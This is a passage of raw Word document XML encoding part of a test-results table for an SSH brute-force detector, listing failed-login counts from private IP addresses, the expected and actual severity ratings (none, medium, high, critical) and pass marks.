              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.20.0.1, fails=4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7 failed SSH logins, run detector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.20.0.2, fails=7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BRUTE_FORCE MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BRUTE_FORCE MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">25 failed SSH logins, run detector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.20.0.3, fails=25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BRUTE_FORCE HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BRUTE_FORCE HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">60 failed SSH logins, run detector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.20.0.4, fails=60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BRUTE_FORCE CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BRUTE_FORCE CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Run detector again in the same bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.20.0.2, existing detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No new row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
